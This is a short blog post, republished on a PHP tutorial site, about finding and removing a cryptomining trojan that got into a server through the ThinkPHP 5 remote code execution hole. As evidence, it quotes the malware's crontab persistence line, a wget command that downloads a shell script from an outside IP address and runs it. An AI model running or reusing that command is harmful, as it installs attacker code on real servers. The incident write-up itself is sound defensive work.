Home > PHP Framework > ThinkPHP > Trojan removal experience: Dealing with a Trojan that exploited thinkphp5 remote code execution vulnerability

Trojan removal experience: Dealing with a Trojan that exploited thinkphp5 remote code execution vulnerability

藏色散人
Release: 2021-04-07 08:45:31
forward
2777 people have browsed it

The following tutorial column of thinkphp will introduce to you how to deal with a Trojan that exploits thinkphp5 remote code execution vulnerability. I hope it will be helpful to friends in need!

Trojan removal experience: Dealing with a Trojan that exploited thinkphp5 remote code execution vulnerability

Remember the experience of removing a Trojan horse: dealing with a Trojan horse that exploited the thinkphp5 remote code execution vulnerability

Yesterday I discovered that a server was suddenly slow The top shows that more than 100% of the CPU usage of several processes is

The execution command is:

/tmp/php  -s /tmp/p2.conf
Copy after login

It is basically certain that it has been hung

The next step is to determine the source

last No login record

Kill these processes first, but they appear again after a few minutes

Let’s see what this Trojan wants to do first

netstat See This Trojan opened a port and established a connection with a certain IP abroad

But tcpdump did not find any data transfer for a while

What did he want to do?

Continue to check the log

I found in the cron log that the www user has a crontab timing operation, which is basically the problem

wget -q -O - http://83.220.169.247/cr3.sh | sh > /dev/null 2>&1
Copy after login

I downloaded a few problems and took a look. It seems to be a mining Trojan program

The www user on the server was created by installing lnmp. Looking at the source, it is probably a web vulnerability.

Look at the permissions of php under /tmp is www

Check the logs of several sites under lnmp and find that it is using the remote code execution vulnerability recently exposed in thinkphp 5

Vulnerability details: https://nosec.org/home/detail/2050.html

Fix the problem and solve it

But this site is a test site and the port listening is 8083. Could it be that hackers are now Can you start sniffing unconventional ports?

Source: https://www.simapple.com/425.html

Related recommendations: The latest 10 thinkphp video tutorials

The above is the detailed content of Trojan removal experience: Dealing with a Trojan that exploited thinkphp5 remote code execution vulnerability. For more information, please follow other related articles on the PHP Chinese website!

Related labels:
source:simapple
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template